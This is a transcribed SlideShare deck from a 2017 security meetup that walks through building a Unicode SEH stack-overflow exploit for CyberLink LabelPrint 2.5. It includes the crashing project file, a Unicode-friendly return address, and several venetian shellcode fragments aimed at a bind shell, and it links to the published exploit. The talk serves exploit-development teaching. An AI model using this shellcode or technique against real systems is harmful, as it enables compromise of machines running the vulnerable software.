Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Exploit
Development
Cyberlink LabelPrint 2.5 Unicode Stack Overflow
IT Audit & IT Security Meetup #4 - Sharing in the Clou...
Who?
 Thomas Gregory - @modpr0be
 IT Security consultant @Spentera
 Security researcher (occasionally)
 focus on Windo...
What?
 CyberLink LabelPrint 2.5
 Labeling software
 Embedded by default in CyberLink Power2Go
installation.
 Included ...
Why?
 The exploit development is quite challenging and
interesting
 We want to share it for education purposes only.
Let’s Begin
THE FUZZ
Fuzzing possibility
 File Input
 import
 open media
 open project
 Registry overflow
Tools
 Immunity Debugger
 with mona plugin
 Editor/IDE
 /me using sublime text
LabelPrint Project
 Project file with extension .lpp
 Header
<PROJECT version="1.0.00">
<INFORMATION title="" author="" ...
The Bug
 In the name parameter, inside the TRACK tag
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/2...
SEH Overwritten
 Overwritten SE Handler
Unicode Based
 AA or 4141 will be .A.A or 00410041
What is SEH?
 a piece of code that is written inside an
application, with the purpose of dealing with the
fact that the a...
What is SEH?
This structure ( also called a SEH record) is 8 bytes
and has 2 (4 bytes) elements :
 a pointer to the next ...
Abusing SEH
In other words, the payload must do the following
things:
 Cause an exception. Without an exception, the SEH
...
Abusing SEH
 When the exception occurred, the position on the
stack will going like this:
 Possible value to overwrite S...
Abusing SEH
Image was taken from http://corelan.be
with permission from Peter van Eeckhoutte (Corelan)
Unicode?
 Unicode allows us to visually represent and/or
manipulate text in most of the systems across the
world in a con...
More Info
 Structured Exception Handler (SEH)
 https://msdn.microsoft.com/en-
us/library/windows/desktop/ms680657(v=vs.8...
SEH + Unicode = Venetian
PROBABLY THE MOST HATED COMBINATION
Venetian Shellcode
 One of the registers must point at the beginning of
the shellcode.
 One register must point at a mem...
Typical Venetian Unicode
Prepend Opcode
Align EAX
Register
•If we use EAX as
BufferRegister, we
need to align EAX to
point...
Typical Venetian Unicode
Prepend Opcode
ven = "x56" #push esi
ven += "x41" #align
ven += "x58" #pop eax
ven += "x41" #alig...
Problem?
 Limited instruction (because of Unicode)
 need to find POP POP RET with Unicode friendly
 All hex value betwe...
Sh*t!
Solution
 Find a proper Unicode friendly PPR (pop pop ret)
instructions address somewhere in the library or
executable
 ...
Our Venetian Unicode
Shellcode
Align EAX
Register
Calculate
where RET will
be placed
Construct RET
in EAX
Calculate EAX
fo...
pop pop ret
 !mona seh
 Fortunately, we found one address that is an
Unicode friendly (0x0044002c) in the main
program (...
Construct RET (1)
 Calculate the value of EAX register, preparing the
address where we exactly want the decoded RET
being...
Construct RET (2)
Preparing address to push our RET:
 push esp
 pop eax
 and EAX register with 01001B00
 and EAX regis...
Construct RET (3)
 After the calculation in EAX, now the stack (ESP) will be
pointing at 0x0012F655 (the same value as EA...
Construct RET (4)
Zeroing Out EAX
 We need to clear the EAX register for the next
calculation of the RET opcode.
 After EAX is zeroed out ...
Zeroing Out EAX
ven += "x42" #nop
ven += "x25x7ex7e" #and eax,7e007e00
ven += "x42" #nop
ven += "x25x01x01" #and eax,01000...
Construct RET (5)
Preparing RET opcode:
 Zeroing Out EAX first (done)
 XOR EAX register with 7f007f00
 ADD EAX register...
The RET Opcode (1)
ven += "x35x7fx7f" #xor eax,7f007f00
ven += "x42" #nop
ven += "x05x44x44" #add eax,44004400
ven += "x42...
The RET Opcode (2)
Construct CALL to ESP (1)
Construct CALL to ESP (2)
Construct CALL to ESP (3)
Stack Walk to Shellcode
Our Venetian Shellcode
ven += "x58" #pop eax
ven += "x42" #nop
ven += "x58" #pop eax
ven += "x42" #nop
ven += "x05x10x01" ...
Final Exploit
https://www.exploit-db.com/exploits/42777/
Solution
 For now, do not user CyberLink Label Print.
Thank you
research@spentera.id
Upcoming SlideShare
Loading in …5
×

CyberLink LabelPrint 2.5 Exploitation Process

864 views

Published on

This presentation was presented at IT Audit & IT Security Meetup #4 at Indonesian Cloud, Jakarta.
The exploit development process was quite challenging and we think that it's worth to share.
For educational purposes only.

Published in: Software
  • Nice !! Download 100 % Free Ebooks, PPts, Study Notes, Novels, etc @ https://www.ThesisScientist.com
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

CyberLink LabelPrint 2.5 Exploitation Process

  1. 1. Exploit Development Cyberlink LabelPrint 2.5 Unicode Stack Overflow IT Audit & IT Security Meetup #4 - Sharing in the Cloud Indonesian Cloud, Jakarta, 13 October 2017
  2. 2. Who?  Thomas Gregory - @modpr0be  IT Security consultant @Spentera  Security researcher (occasionally)  focus on Windows exploitation  IT Security trainer (sometimes)  f3ci - ????  Security researcher  Penetration tester, red team  Appsec & simple exploit dev
  3. 3. What?  CyberLink LabelPrint 2.5  Labeling software  Embedded by default in CyberLink Power2Go installation.  Included as bloatware in all Lenovo, HP, Asus laptops somewhere between 2015-2016.
  4. 4. Why?  The exploit development is quite challenging and interesting  We want to share it for education purposes only.
  5. 5. Let’s Begin THE FUZZ
  6. 6. Fuzzing possibility  File Input  import  open media  open project  Registry overflow
  7. 7. Tools  Immunity Debugger  with mona plugin  Editor/IDE  /me using sublime text
  8. 8. LabelPrint Project  Project file with extension .lpp  Header <PROJECT version="1.0.00"> <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017"> <TRACK name=“” />
  9. 9. The Bug  In the name parameter, inside the TRACK tag <PROJECT version="1.0.00"> <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017"> <TRACK name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA” /> </INFORMATION> </PROJECT>
  10. 10. SEH Overwritten  Overwritten SE Handler
  11. 11. Unicode Based  AA or 4141 will be .A.A or 00410041
  12. 12. What is SEH?  a piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from corelan)  an exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.  a catcher, who is trying to catch unusual behavior.
  13. 13. What is SEH? This structure ( also called a SEH record) is 8 bytes and has 2 (4 bytes) elements :  a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable the handle the exception)  a pointer, the address of the actual code of the exception handler. (SE Handler)
  14. 14. Abusing SEH In other words, the payload must do the following things:  Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in.  Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)  Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.  The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it).
  15. 15. Abusing SEH  When the exception occurred, the position on the stack will going like this:  Possible value to overwrite SE Handler are POP something, POP something and RETN to the stack.  It will POP address that sit at the top of the stack, POP it again to take the second address, and RETN to execute the third address (which is now at the top of the stack)  The third address usually our supplied input buffer Top of stack Our pointer to next SEH address
  16. 16. Abusing SEH Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
  17. 17. Unicode?  Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.  Unicode based exploit usually involved in  file/folder naming  part of input parameter that will deal with naming
  18. 18. More Info  Structured Exception Handler (SEH)  https://msdn.microsoft.com/en- us/library/windows/desktop/ms680657(v=vs.85).aspx  https://www.corelan.be/index.php/2009/07/25/writi ng-buffer-overflow-exploits-a-quick-and-basic- tutorial-part-3-seh/  https://blog.spentera.com/2011/09/14/seh-based- stack-overflow-the-basic/  Unicode based exploit  https://www.corelan.be/index.php/2009/11/06/expl oit-writing-tutorial-part-7-unicode-from-0x00410041- to-calc/
  19. 19. SEH + Unicode = Venetian PROBABLY THE MOST HATED COMBINATION
  20. 20. Venetian Shellcode  One of the registers must point at the beginning of the shellcode.  One register must point at a memory location that is writeable (and where it’s ok to write the new reassembled shellcode)  Normal venetian prepend shellcode  Push another register to stack (ESP)  Pop stack (ESP) into EAX  Align the EAX register with add/sub instruction  Push EAX register into stack (ESP)  RET (return to the beginning of shellcode at EAX)  Sadly, we won’t face a normal venetian approach
  21. 21. Typical Venetian Unicode Prepend Opcode Align EAX Register •If we use EAX as BufferRegister, we need to align EAX to point to our Buffer “Stack Walking” •Walk over the Next SEH and SEH. RET to Shellcode • Shellcode executed
  22. 22. Typical Venetian Unicode Prepend Opcode ven = "x56" #push esi ven += "x41" #align ven += "x58" #pop eax ven += "x41" #align ven += "x05x04x01" #add eax,01000400 ven += "x41" #align ven += "x2dx01x01" #add eax,01000100 ven += "x41" #align ven += "x50" #push eax ven += "x41" #align ven += "xc3" #ret Depends on where our buffer is. Use EAX as a BufferRegister
  23. 23. Problem?  Limited instruction (because of Unicode)  need to find POP POP RET with Unicode friendly  All hex value between 0x80 – 0xFF are marked as bad  Yes, RET opcode (C3) is also included in the bad character list.  Meanwhile, our venetian shellcode need RET  Typical Venetian
  24. 24. Sh*t!
  25. 25. Solution  Find a proper Unicode friendly PPR (pop pop ret) instructions address somewhere in the library or executable  Create “our version” of RET  Fill the stack (ESP) with our shellcode  Pointing our RET to CALL ESP instruction address  This will alter the flow of execution.  EAX must be pointing to the beginning of our shellcode.  “Stack walk” until we meet shellcode.
  26. 26. Our Venetian Unicode Shellcode Align EAX Register Calculate where RET will be placed Construct RET in EAX Calculate EAX for CALL ESP Opcode Reaching RET, Execute CALL ESP Re-aligning EAX “Stack walk” to Shellcode Bind shell 4444
  27. 27. pop pop ret  !mona seh  Fortunately, we found one address that is an Unicode friendly (0x0044002c) in the main program (LabelPrint.exe)
  28. 28. Construct RET (1)  Calculate the value of EAX register, preparing the address where we exactly want the decoded RET being placed later in the stack.  Limited calculation (because of UNICODE)  Zeroing the EAX register first  xor eax,eax
  29. 29. Construct RET (2) Preparing address to push our RET:  push esp  pop eax  and EAX register with 01001B00  and EAX register with 01000100  push EAX  pop ESP ven += "x42" #nop ven += "x54" #push esp ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x1Bx01" #add eax 01001B00 ven += "x42" #nop ven += "x2dx01x01" #sub eax 01001000 ven += "x42" #nop ven += "x50" #push eax ven += "x42" #nop ven += "x5c" #pop esp
  30. 30. Construct RET (3)  After the calculation in EAX, now the stack (ESP) will be pointing at 0x0012F655 (the same value as EAX)  This is important for our RET decoding address later.
  31. 31. Construct RET (4)
  32. 32. Zeroing Out EAX  We need to clear the EAX register for the next calculation of the RET opcode.  After EAX is zeroed out we can calculate the EAX register to meet 0xC300C300 (RET opcode).  We can perform the calculation with AND operand :  AND EAX register with 7e007e00  AND EAX register with 01000100
  33. 33. Zeroing Out EAX ven += "x42" #nop ven += "x25x7ex7e" #and eax,7e007e00 ven += "x42" #nop ven += "x25x01x01" #and eax,01000100
  34. 34. Construct RET (5) Preparing RET opcode:  Zeroing Out EAX first (done)  XOR EAX register with 7f007f00  ADD EAX register with 44004400  PUSH EDI  PUSH EAX
  35. 35. The RET Opcode (1) ven += "x35x7fx7f" #xor eax,7f007f00 ven += "x42" #nop ven += "x05x44x44" #add eax,44004400 ven += "x42" #nop ven += "x57" #push edi/padding ven += "x42" #nop ven += "x50" #push eax
  36. 36. The RET Opcode (2)
  37. 37. Construct CALL to ESP (1)
  38. 38. Construct CALL to ESP (2)
  39. 39. Construct CALL to ESP (3)
  40. 40. Stack Walk to Shellcode
  41. 41. Our Venetian Shellcode ven += "x58" #pop eax ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x10x01" #add eax, 11001900, align eax to our buffer ven += "x42" #nop ven += "x2dx0ex01" #add eax, 11001800, align eax to our buffer ven += "x42" #nop ven += "x50" #push eax ven += "x42" #nop ven += "x5C" #pop esp ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x53x7c" #add eax 7c005300 part of call esp ven += "x42" #nop ven += "x50" #push eax ven += "x42" * 68 #padding to fill the stack ven += "x7bx32" #part of call esp
  42. 42. Final Exploit https://www.exploit-db.com/exploits/42777/
  43. 43. Solution  For now, do not user CyberLink Label Print.
  44. 44. Thank you research@spentera.id

×